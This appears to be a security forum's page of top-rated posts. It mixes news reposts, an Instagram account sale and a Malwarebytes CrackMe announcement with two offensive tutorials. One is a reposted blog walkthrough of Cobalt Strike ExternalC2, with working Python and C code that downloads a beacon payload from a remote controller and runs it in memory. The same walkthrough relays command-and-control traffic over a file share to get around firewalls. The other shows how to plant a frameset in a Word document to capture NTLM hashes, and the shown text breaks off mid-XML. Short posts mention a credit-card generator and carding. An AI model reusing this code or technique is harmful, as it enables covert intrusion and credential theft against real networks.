Leaderboard

Popular Content

Showing content with the highest reputation on 05/09/18 in all areas

  1. Selling an Instagram account with 11k followers at the time of posting. Details: Niche: comedy, funny images. Followers: 11K. Engagement: 500-2,000 likes + comments per picture. Payment accepted: PayPal. The price is $8 per 1,000 followers, so at the moment the account goes for $80. Anyone interested can send me a PM.
    1 point
  2. A study funded by DARPA has increased the possibility of memory-enhancing brain prosthetics. Earlier animal research showed successful results, after which the study was conducted on patients at Wake Forest Baptist Medical Center. The patients there already had brain implants as part of their epilepsy treatment, and they experienced major improvements in both short-term and long-term memory. The patients were asked to play a memory-related computer game in which they had to remember specific things. While the patients were trying to remember those things, the researchers recorded various patterns of neural firing in the brain's hippocampus, the area of the brain responsible for memory. They also paid attention to the neural patterns that resulted in a correct memory being encoded. After that, they had the patients play the game again and electrically stimulated each patient's brain using the encoding patterns studied earlier. They were hoping to use that electrical stimulation to trigger more effective storage of the memory data. The method worked and showed results that were better than the team expected: scores on the short-term memory tests jumped by 37%, and the long-term memory tests improved by 35%. Robert Hampson, the lead author of the study, said, "We showed that we could tap into a patient's own memory content, reinforce it and feed it back to the patient. Even when a person's memory is impaired, it is possible to identify the neural firing patterns that indicate correct memory formation and separate them from the patterns that are incorrect. We can then feed in the correct patterns to assist the patient's brain in accurately forming new memories, not as a replacement for innate memory function, but as a boost to it." The research has opened the door to memory-enhancing brain implants. These implants might offer a button that can be pressed while looking at something to increase the chances of remembering it later. The researchers see this as a potential medical device to help patients with Alzheimer's, stroke, or traumatic brain injury. The implant would help them restart the process of forming new memories using their brain's own activity patterns. The team also hopes that the technology might be able to assist people in keeping memories they have already encoded. Hampson says, "In the future, we hope to be able to help people hold onto specific memories, such as where they live or what their grandkids look like, when their overall memory begins to fail." Source: http://wonderfulengineering.com/brain-prosthetic-boost-memory-shown-impressive-results-human-trials/
    1 point
  3. 1 point
  4. You have to ask yourself that question: "I've got 18 million, isn't it time I stopped?"
    1 point
  5. Their life is over. They'll get 300 years in prison for that...
    1 point
  6. It's valid (self), for those who don't trust it.
    1 point
  7. I'm curious how you guys make money from PopAds; I know those things hurt your SEO.
    1 point
  8. Yes, the vulnerable parameter is alert('xss') in the console. Why did you scroll down so the search form wouldn't show? Pathetic... Nice "CC generator" in your bookmarks, you're good @aramen @Nytro In case he deletes the picture: http://prntscr.com/je217y Out with this carder. @Zekor I've had redtube in my bookmarks for ages too, nothing to do with them, I swear...
    1 point
  9. As before, the CrackMe is dedicated to malware analysts and to those who want to practice becoming them. That's why it is not just a set of abstract riddles, but an exercise that walks through selected tricks that were used in real malware. (Expect some original schemes designed just for this game, too.) Of course, all of it is demonstrated on harmless examples, but we still recommend you use a VM for reversing it so that it will not interfere with any antivirus protection.

Rules of the contest

There are two CrackMe contests:

Capture the flag. The first three submitted flags win. The flag should be submitted along with (minimalistic) notes about the steps taken to find it. (No detailed write-up is required.)

Best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show his/her method of solving the CrackMe, as well as their level of understanding of the techniques used. The write-up submission contest closes three weeks after capture the flag.

Submissions to both contests should be sent to my Twitter account: @hasherezade. Each of the four winners will get a prize: a book of his/her choice and some Malwarebytes swag. At the end of the contest, I will publish my own solution, written from the author's point of view. All the submitted write-ups will be linked.

Asking questions

I want the contest to be fair to everyone, so I will not be answering any questions in private. However, if you are stuck, please don't hesitate to post your question in the comments section of this post, and I will answer as soon as possible. The questions can also be answered by other participants. Giving false clues or teasing beginners will result in a ban; please respect fair play.

The application

The application is a Windows executable. It was tested on Windows 7 and above. You can download it here. Have fun!

Source: https://blog.malwarebytes.com/security-world/2018/04/malwarebytes-crackme-2-another-challenge/
    1 point
  10. Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
    1 point
  11. My personal challenge for 2016 was to build a simple AI to run my home -- like Jarvis in Iron Man. My goal was to learn about the state of artificial intelligence -- where we're further along than people realize and where we're still a long ways off. These challenges always lead me to learn more than I expected, and this one also gave me a better sense of all the internal technology Facebook engineers get to use, as well as a thorough overview of home automation.

So far this year, I've built a simple AI that I can talk to on my phone and computer, that can control my home, including lights, temperature, appliances, music and security, that learns my tastes and patterns, that can learn new words and concepts, and that can even entertain Max. It uses several artificial intelligence techniques, including natural language processing, speech recognition, face recognition, and reinforcement learning, written in Python, PHP and Objective C. In this note, I'll explain what I built and what I learned along the way.

Diagram of the systems connected to build Jarvis.

Getting Started: Connecting the Home

In some ways, this challenge was easier than I expected. In fact, my running challenge (I also set out to run 365 miles in 2016) took more total time. But one aspect that was much more complicated than I expected was simply connecting and communicating with all of the different systems in my home. Before I could build any AI, I first needed to write code to connect these systems, which all speak different languages and protocols. We use a Crestron system with our lights, thermostat and doors, a Sonos system with Spotify for music, a Samsung TV, a Nest cam for Max, and of course my work is connected to Facebook's systems. I had to reverse engineer APIs for some of these to even get to the point where I could issue a command from my computer to turn the lights on or get a song to play.

Further, most appliances aren't even connected to the internet yet. It's possible to control some of these using internet-connected power switches that let you turn the power on and off remotely. But often that isn't enough. For example, one thing I learned is it's hard to find a toaster that will let you push the bread down while it's powered off so you can automatically start toasting when the power goes on. I ended up finding an old toaster from the 1950s and rigging it up with a connected switch. Similarly, I found that connecting a food dispenser for Beast or a grey t-shirt cannon would require hardware modifications to work. For assistants like Jarvis to be able to control everything in homes for more people, we need more devices to be connected and the industry needs to develop common APIs and standards for the devices to talk to each other.

An example natural language request from command line.

Natural Language

Once I wrote the code so my computer could control my home, the next step was making it so I could talk to my computer and home the way I'd talk to anyone else. This was a two-step process: first I made it so I could communicate using text messages, and later I added the ability to speak and have it translate my speech into text for it to read. It started simple by looking for keywords, like "bedroom", "lights", and "on" to determine I was telling it to turn the lights on in the bedroom. It quickly became clear that it needed to learn synonyms, like that "family room" and "living room" mean the same thing in our home. This meant building a way to teach it new words and concepts.
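As a rough illustration of the keyword-and-synonym matching described above, here is a minimal Python sketch. The room names, synonym table, and actions are assumptions made up for this example, not Jarvis's actual code:

# Minimal sketch of keyword matching with taught synonyms (illustrative only)
SYNONYMS = {"family room": "living room", "lounge": "living room"}
ROOMS = {"bedroom", "living room", "kitchen"}
ACTIONS = {"on", "off"}

def normalize(text):
    text = text.lower()
    for alias, canonical in SYNONYMS.items():
        text = text.replace(alias, canonical)   # apply taught equivalences
    return text

def parse_lights_command(text):
    # Return (room, action) if the message looks like a lights command
    words = normalize(text)
    room = next((r for r in ROOMS if r in words), None)
    action = next((a for a in ACTIONS if a in words.split()), None)
    if "lights" in words and room and action:
        return room, action
    return None

print(parse_lights_command("Turn the lights on in the family room"))
# -> ('living room', 'on')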
Understanding context is important for any AI. For example, when I tell it to turn the AC up in "my office", that means something completely different from when Priscilla tells it the exact same thing. That one caused some issues! Or, for example, when you ask it to make the lights dimmer or to play a song without specifying a room, it needs to know where you are or it might end up blasting music in Max's room when we really need her to take a nap. Whoops.

Music is a more interesting and complex domain for natural language because there are too many artists, songs and albums for a keyword system to handle. The range of things you can ask it is also much greater. Lights can only be turned up or down, but when you say "play X", even subtle variations can mean many different things. Consider these requests related to Adele: "play someone like you", "play someone like adele", and "play some adele". Those sound similar, but each is a completely different category of request. The first plays a specific song, the second recommends an artist, and the third creates a playlist of Adele's best songs. Through a system of positive and negative feedback, an AI can learn these differences.

The more context an AI has, the better it can handle open-ended requests. At this point, I mostly just ask Jarvis to "play me some music" and by looking at my past listening patterns, it mostly nails something I'd want to hear. If it gets the mood wrong, I can just tell it, for example, "that's not light, play something light", and it can both learn the classification for that song and adjust immediately. It also knows whether I'm talking to it or Priscilla is, so it can make recommendations based on what we each listen to. In general, I've found we use these more open-ended requests more frequently than more specific asks. No commercial products I know of do this today, and this seems like a big opportunity.

Jarvis uses face recognition to let my friends in automatically and let me know.

Vision and Face Recognition

About one-third of the human brain is dedicated to vision, and there are many important AI problems related to understanding what is happening in images and videos. These problems include tracking (eg is Max awake and moving around in her crib?), object recognition (eg is that Beast or a rug in that room?), and face recognition (eg who is at the door?).

Face recognition is a particularly difficult version of object recognition because most people look relatively similar compared to telling apart two random objects -- for example, a sandwich and a house. But Facebook has gotten very good at face recognition for identifying when your friends are in your photos. That expertise is also useful when your friends are at your door and your AI needs to determine whether to let them in.

To do this, I installed a few cameras at my door that can capture images from all angles. AI systems today cannot identify people from the back of their heads, so having a few angles ensures we see the person's face. I built a simple server that continuously watches the cameras and runs a two-step process: first, it runs face detection to see if any person has come into view, and second, if it finds a face, then it runs face recognition to identify who the person is. Once it identifies the person, it checks a list to confirm I'm expecting that person, and if I am then it will let them in and tell me they're here.
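The two-step detect-then-recognize pipeline described above can be sketched as a small polling loop. In this hedged Python sketch, detect_faces(), identify(), and the camera/door/notify callables are hypothetical stand-ins for real models and home-automation hooks, not the actual Jarvis server:

import time

EXPECTED_GUESTS = {"alice", "bob"}  # hypothetical list of expected visitors

def watch_door(camera, detect_faces, identify, open_door, notify):
    while True:
        frame = camera.read()
        # Step 1: cheap face detection -- has anyone come into view?
        for face in detect_faces(frame):
            # Step 2: heavier face recognition -- who is it?
            name = identify(face)
            if name in EXPECTED_GUESTS:
                open_door()
                notify(f"{name} is at the door -- letting them in.")
        time.sleep(0.5)  # poll the camera a couple of times per second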
This type of visual AI system is useful for a number of things, including knowing when Max is awake so it can start playing music or a Mandarin lesson, or solving the context problem of knowing which room in the house we're in so the AI can correctly respond to context-free requests like "turn the lights on" without providing a location. Like most aspects of this AI, vision is most useful when it informs a broader model of the world, connected with other abilities like knowing who your friends are and how to open the door when they're here. The more context the system has, the smarter it gets overall.

I can text Jarvis from anywhere using a Messenger bot.

Messenger Bot

I programmed Jarvis on my computer, but in order to be useful I wanted to be able to communicate with it from anywhere I happened to be. That meant the communication had to happen through my phone, not a device placed in my home.

I started off building a Messenger bot to communicate with Jarvis because it was so much easier than building a separate app. Messenger has a simple framework for building bots, and it automatically handles many things for you -- working across both iOS and Android, supporting text, image and audio content, reliably delivering push notifications, managing identity and permissions for different people, and more. You can learn about the bot framework at messenger.com/platform.

I can text anything to my Jarvis bot, and it will instantly be relayed to my Jarvis server and processed. I can also send audio clips and the server can translate them into text and then execute those commands. In the middle of the day, if someone arrives at my home, Jarvis can text me an image and tell me who's there, or it can text me when I need to go do something.

One thing that surprised me about my communication with Jarvis is that when I have the choice of either speaking or texting, I text much more than I would have expected. This is for a number of reasons, but mostly it feels less disturbing to people around me. If I'm doing something that relates to them, like playing music for all of us, then speaking feels fine, but most of the time text feels more appropriate. Similarly, when Jarvis communicates with me, I'd much rather receive that over text message than voice. That's because voice can be disruptive and text gives you more control of when you want to look at it. Even when I speak to Jarvis, if I'm using my phone, I often prefer it to text or display its response.

This preference for text communication over voice communication fits a pattern we're seeing with Messenger and WhatsApp overall, where the volume of text messaging around the world is growing much faster than the volume of voice communication. This suggests that future AI products cannot be solely focused on voice and will need a private messaging interface as well. Once you're enabling private messaging, it's much better to use a platform like Messenger than to build a new app from scratch. I have always been optimistic about AI bots, but my experience with Jarvis has made me even more optimistic that we'll all communicate with bots like Jarvis in the future.

Jarvis uses speech recognition in my iOS app to listen to my request for a fresh t-shirt.

Voice and Speech Recognition

Even though I think text will be more important for communicating with AIs than people realize, I still think voice will play a very important role too. The most useful aspect of voice is that it's very fast.
You don't need to take out your phone, open an app, and start typing -- you just speak. To enable voice for Jarvis, I needed to build a dedicated Jarvis app that could listen continuously to what I say. The Messenger bot is great for many things, but the friction for using speech is way too much. My dedicated Jarvis app lets me put my phone on a desk and just have it listen. I could also put a number of phones with the Jarvis app around my home so I could talk to Jarvis in any room. That seems similar to Amazon's vision with Echo, but in my experience, it's surprising how frequently I want to communicate with Jarvis when I'm not home, so having the phone be the primary interface rather than a home device seems critical.

I built the first version of the Jarvis app for iOS and I plan to build an Android version soon too. I hadn't built an iOS app since 2012 and one of my main observations is that the toolchain we've built at Facebook since then for developing these apps and for doing speech recognition is very impressive.

Speech recognition systems have improved recently, but no AI system is good enough to understand conversational speech just yet. Speech recognition relies on both listening to what you say and predicting what you will say next, so structured speech is still much easier to understand than unstructured conversation.

Another interesting limitation of speech recognition systems -- and machine learning systems more generally -- is that they are more optimized for specific problems than most people realize. For example, understanding a person talking to a computer is a subtly different problem from understanding a person talking to another person. If you train a machine learning system on data from Google of people speaking to a search engine, it will perform relatively worse on Facebook at understanding people talking to real people. In the case of Jarvis, training an AI that you'll talk to at close range is also different from training a system you'll talk to from all the way across the room, like Echo. These systems are more specialized than it appears, and that implies we are further off from having general systems than it might seem.

On a psychological level, once you can speak to a system, you attribute more emotional depth to it than a computer you might interact with using text or a graphic interface. One interesting observation is that ever since I built voice into Jarvis, I've also wanted to build in more humor. Part of this is that now it can interact with Max and I want those interactions to be entertaining for her, but part of it is that it now feels like it's present with us. I've taught it fun little games where Priscilla or I can ask it who we should tickle and it will randomly tell our family to all go tickle one of us, Max or Beast. I've also had fun adding classic lines like "I'm sorry, Priscilla. I'm afraid I can't do that."

There's a lot more to explore with voice. The AI technology is just getting good enough for this to be the basis of a great product, and it will get much better in the next few years. At the same time, I think the best products like this will be ones you can bring with you anywhere and communicate with privately as well.

Facebook Engineering Environment

As the CEO of Facebook, I don't get much time to write code in our internal environment. I've never stopped coding, but these days I mostly build personal projects like Jarvis.
I expected I'd learn a lot about the state of AI this year, but I didn't realize I would also learn so much about what it's like to be an engineer at Facebook. And it's impressive. My experience of ramping up in the Facebook codebase is probably pretty similar to what most new engineers here go through. I was consistently impressed by how well organized our code is, and how easy it was to find what you're looking for -- whether it's related to face recognition, speech recognition, the Messenger Bot Framework [messenger.com/platform] or iOS development.

The open source Nuclide [github.com/facebook/nuclide] packages we've built to work with GitHub's Atom make development much easier. The Buck [buckbuild.com] build system we've developed to build large projects quickly also saved me a lot of time. Our open source FastText [github.com/facebookresearch/fastText] AI text classification tool is also a good one to check out, and if you're interested in AI development, the whole Facebook Research [github.com/facebookresearch] GitHub repo is worth taking a look at.

One of our values is "move fast". That means you should be able to come here and build an app faster than you can anywhere else, including on your own. You should be able to come here and use our infra and AI tools to build things it would take you a long time to build on your own. Building internal tools that make engineering more efficient is important to any technology company, but this is something we take especially seriously. So I want to give a shout out to everyone on our infra and tools teams that make this so good.

Next Steps

Although this challenge is ending, I'm sure I'll continue improving Jarvis since I use it every day and I'm always finding new things I want to add. In the near term, the clearest next steps are building an Android app, setting up Jarvis voice terminals in more rooms around my home, and connecting more appliances. I'd love to have Jarvis control my Big Green Egg and help me cook, but that will take even more serious hacking than rigging up the t-shirt cannon. In the longer term, I'd like to explore teaching Jarvis how to learn new skills itself rather than me having to teach it how to perform specific tasks. If I spent another year on this challenge, I'd focus more on learning how learning works.

Finally, over time it would be interesting to find ways to make this available to the world. I considered open sourcing my code, but it's currently too tightly tied to my own home, appliances and network configuration. If I ever build a layer that abstracts more home automation functionality, I may release that. Or, of course, that could be a great foundation to build a new product.

Conclusions

Building Jarvis was an interesting intellectual challenge, and it gave me direct experience building AI tools in areas that are important for our future. I've previously predicted that within 5-10 years we'll have AI systems that are more accurate than people for each of our senses -- vision, hearing, touch, etc, as well as things like language. It's impressive how powerful the state of the art for these tools is becoming, and this year makes me more confident in my prediction.

At the same time, we are still far off from understanding how learning works. Everything I did this year -- natural language, face recognition, speech recognition and so on -- is a variant of the same fundamental pattern recognition technique.
We know how to show a computer many examples of something so it can recognize it accurately, but we still do not know how to take an idea from one domain and apply it to something completely different. To put that in perspective, I spent about 100 hours building Jarvis this year, and now I have a pretty good system that understands me and can do lots of things. But even if I spent 1,000 more hours, I probably wouldn't be able to build a system that could learn completely new skills on its own -- unless I made some fundamental breakthrough in the state of AI along the way.

In a way, AI is both closer and farther off than we imagine. AI is closer to being able to do more powerful things than most people expect -- driving cars, curing diseases, discovering planets, understanding media. Those will each have a great impact on the world, but we're still figuring out what real intelligence is.

Overall, this was a great challenge. These challenges have a way of teaching me more than I expected at the beginning. This year I thought I'd learn about AI, and I also learned about home automation and Facebook's internal technology too. That's what's so interesting about these challenges. Thanks for following along with this challenge and I'm looking forward to sharing next year's challenge in a few weeks.

Source: https://www.facebook.com/notes/mark-zuckerberg/building-jarvis/10154361492931634/
    1 point
  12. Exploring Cobalt Strike's ExternalC2 framework

Posted on 30th March 2018

As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike's ExternalC2 framework.

ExternalC2

ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components:

Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel.

Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon.

SMB Beacon - The standard beacon which will be executed on the victim host.

Using the diagram from CS's documentation, we can see just how this all fits together: our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control.

Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. The protocol is actually pretty straightforward, consisting of a 4 byte little-endian length field, and a blob of data.

To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options:

arch - The architecture of the beacon to be used (x86 or x64).
pipename - The name of the pipe used to communicate with the beacon.
block - Time in milliseconds that TeamServer will block between tasks.

Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon. Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data.

OK, enough theory, let's create a "Hello World" example to simply relay the communication over a network.

Hello World ExternalC2 Example

For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2:

# start the External C2 server and bind to 0.0.0.0:2222
externalc2_start("0.0.0.0", 2222);

This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller.
Let's first establish our connection to the TeamServer ExternalC2 interface:

_socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
_socketTS.connect(("127.0.0.1", 2222))

Once established, we need to send over our options. We will create a few quick helper functions to allow us to prefix our 4 byte length without manually crafting it each time:

def encodeFrame(data):
    return struct.pack("<I", len(data)) + data

def sendToTS(data):
    _socketTS.sendall(encodeFrame(data))

Now we can use these helper functions to send over our options:

# Send out config options
sendToTS("arch=x86")
sendToTS("pipename=xpntest")
sendToTS("block=500")
sendToTS("go")

Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again let's create a few helper functions to handle the decoding of packets rather than manually decoding each time:

def decodeFrame(data):
    len = struct.unpack("<I", data[0:4])
    body = data[4:]
    return (len, body)

def recvFromTS():
    data = ""
    _len = _socketTS.recv(4)
    l = struct.unpack("<I", _len)[0]
    while len(data) < l:
        data += _socketTS.recv(l - len(data))
    return data

This allows us to receive raw data with:

data = recvFromTS()

Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to:

_socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
_socketBeacon.bind(("0.0.0.0", 8081))
_socketBeacon.listen(1)
_socketClient = _socketBeacon.accept()[0]

Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host:

while(True):
    print "Sending %d bytes to beacon" % len(data)
    sendToBeacon(data)

    data = recvFromBeacon()
    print "Received %d bytes from beacon" % len(data)

    print "Sending %d bytes to TS" % len(data)
    sendToTS(data)

    data = recvFromTS()
    print "Received %d bytes from TS" % len(data)

Our finished example can be found here. Now that we have a working controller, we need to create our Third-Party Client. To make things a bit easier, we will use win32 and C for this, giving us access to the Windows native API. Let's start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller:

// Creates a new C2 controller connection for relaying commands
SOCKET createC2Socket(const char *addr, WORD port) {
    WSADATA wsd;
    SOCKET sd;
    SOCKADDR_IN sin;

    WSAStartup(0x0202, &wsd);

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.S_un.S_addr = inet_addr(addr);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    connect(sd, (SOCKADDR*)&sin, sizeof(sin));

    return sd;
}

Next, we need a way to receive data.
This is similar to what we saw in our Python code, with our length prefix being used as an indicator of how many data bytes we are receiving:

// Receives data from our C2 controller to be relayed to the injected beacon
char *recvData(SOCKET sd, DWORD *len) {
    char *buffer;
    DWORD bytesReceived = 0, totalLen = 0;

    *len = 0;
    recv(sd, (char *)len, 4, 0);

    buffer = (char *)malloc(*len);
    if (buffer == NULL)
        return NULL;

    while (totalLen < *len) {
        bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0);
        totalLen += bytesReceived;
    }
    return buffer;
}

Similarly, we need a way to return data over our C2 channel to the Controller:

// Sends data to our C2 controller received from our injected beacon
void sendData(SOCKET sd, const char *data, DWORD len) {
    char *buffer = (char *)malloc(len + 4);
    if (buffer == NULL)
        return;

    DWORD bytesWritten = 0, totalLen = 0;

    *(DWORD *)buffer = len;
    memcpy(buffer + 4, data, len);

    while (totalLen < len + 4) {
        bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0);
        totalLen += bytesWritten;
    }
    free(buffer);
}

Now that we have the ability to communicate with our Controller, the first thing we want to do is receive the beacon payload. This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and it is expected to be copied into memory before being executed. For example, let's grab the beacon payload:

// Create a connection back to our C2 controller
SOCKET c2socket = createC2Socket("192.168.1.65", 8081);
payloadData = recvData(c2socket, &payloadLen);

And then, for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code:

HANDLE threadHandle;
DWORD threadId = 0;

char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (alloc == NULL)
    return;

memcpy(alloc, payload, len);
threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId);

Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands):

// Loop until the pipe is up and ready to use
while (beaconPipe == INVALID_HANDLE_VALUE) {
    // Create our IPC pipe for talking to the C2 beacon
    Sleep(500);
    beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest");
}

And then, once we have a connection, we can continue with our send/recv loop:

while (true) {
    // Start the pipe dance
    payloadData = recvFromBeacon(beaconPipe, &payloadLen);
    if (payloadLen == 0) break;

    sendData(c2socket, payloadData, payloadLen);
    free(payloadData);

    payloadData = recvData(c2socket, &payloadLen);
    if (payloadLen == 0) break;

    sendToBeacon(beaconPipe, payloadData, payloadLen);
    free(payloadData);
}

And that's it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here.

Now, onto something a bit more interesting.

Transfer C2 over file

Let's recap on what it is we control when attempting to create a custom C2 protocol. From here, we can see that the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let's attempt to port this into something a bit more interesting, transferring data over a file read/write. Why would we want to do this?
Well, let's say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted, however, is access to a file share... see where I'm going with this? By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall'd machine, we have a way to run our Cobalt Strike beacon.

Let's think about just how this will look. Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third-Party Controller. Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller. What we will do, however, is split our previous Third-Party Client into 2 parts. One is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second, which runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon.

I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITE options are provided. This will allow both sides of the Third-Party Client to read and write to the file simultaneously:

HANDLE openC2FileServer(const char *filepath) {
    HANDLE handle;

    handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE,
                         FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                         CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (handle == INVALID_HANDLE_VALUE)
        printf("Error opening file: %x\n", GetLastError());

    return handle;
}

Next, we need a way of serialising our C2 data into the file, as well as indicating which of the 2 clients should be processing data at any time. To do this, a simple header can be used, for example:

struct file_c2_header {
    DWORD id;
    DWORD len;
};

The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who should be writing data.
Putting together our file read and write helpers, we have something that looks like this:

void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) {
    char *fileBytes = NULL;
    DWORD bytesWritten = 0;

    fileBytes = (char *)malloc(8 + len);
    if (fileBytes == NULL)
        return;

    // Add our file header
    *(DWORD *)fileBytes = id;
    *(DWORD *)(fileBytes + 4) = len;
    memcpy(fileBytes + 8, data, len);

    // Make sure we are at the beginning of the file
    SetFilePointer(c2File, 0, 0, FILE_BEGIN);

    // Write our C2 data in
    WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL);
    printf("[*] Wrote %d bytes\n", bytesWritten);
}

char *readC2File(HANDLE c2File, DWORD *len, int expect) {
    char header[8];
    DWORD bytesRead = 0;
    char *fileBytes = NULL;

    memset(header, 0xFF, sizeof(header));

    // Poll until we have our expected id in the header
    while (*(DWORD *)header != expect) {
        SetFilePointer(c2File, 0, 0, FILE_BEGIN);
        ReadFile(c2File, header, 8, &bytesRead, NULL);
        Sleep(100);
    }

    // Read out the expected length from the header
    *len = *(DWORD *)(header + 4);

    fileBytes = (char *)malloc(*len);
    if (fileBytes == NULL)
        return NULL;

    // Finally, read out our C2 data
    ReadFile(c2File, fileBytes, *len, &bytesRead, NULL);
    printf("[*] Read %d bytes\n", bytesRead);

    return fileBytes;
}

Here we see that we are adding our header to the file, then reading and writing C2 data to the file respectively. And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop, and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here. Let's see this in action.

If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2.

Source: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
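To recap the file-based relay above, here is a rough Python sketch of the "Internet Connected Host" half: it receives framed C2 data from the Third-Party Controller's socket, writes it into the shared file under its own ID, then polls for the restricted host's reply. The blog implements both halves in C; this Python version, along with the share path, IDs, and polling interval, is an assumption-laden illustration of the same logic, not the author's code:

import socket, struct, time

SHARE_FILE = r"\\fileserver\share\c2channel.bin"   # hypothetical share path
WRITE_ID, READ_ID = 0, 1   # header IDs marking whose turn it is to read

def recv_frame(sock):
    # 4 byte little-endian length prefix, then the data itself
    length = struct.unpack("<I", sock.recv(4))[0]
    data = b""
    while len(data) < length:
        data += sock.recv(length - len(data))
    return data

def write_c2_file(data, ident):
    with open(SHARE_FILE, "r+b") as f:       # file created by the C client
        f.write(struct.pack("<II", ident, len(data)) + data)

def read_c2_file(expect):
    while True:                              # poll until it's our turn
        with open(SHARE_FILE, "rb") as f:
            ident, length = struct.unpack("<II", f.read(8))
            if ident == expect:
                return f.read(length)
        time.sleep(0.1)

controller = socket.create_connection(("192.168.1.65", 8081))
while True:
    write_c2_file(recv_frame(controller), WRITE_ID)            # controller -> file
    reply = read_c2_file(READ_ID)                              # file -> controller
    controller.sendall(struct.pack("<I", len(reply)) + reply)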
    1 point
  13. Microsoft Office – NTLM Hashes via Frameset

December 18, 2017

Microsoft Office documents play a vital role in red team assessments, as they are usually used to gain an initial foothold on the client's internal network. Staying under the radar is a key element as well, and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft Office. Historically, Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document to a UNC path and combine this with Responder in order to capture NTLM hashes externally.

Word documents with the docx extension are actually a zip file which contains various XML documents. These XML files control the theme, the fonts, the settings of the document and the web settings. Using 7-Zip it is possible to open that archive in order to examine these files.

Docx Contents

The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the frameset. Adding the following code will create a link with another file:

<w:frameset>
    <w:framesetSplitbar>
        <w:w w:val="60"/>
        <w:color w:val="auto"/>
        <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
        <w:frame>
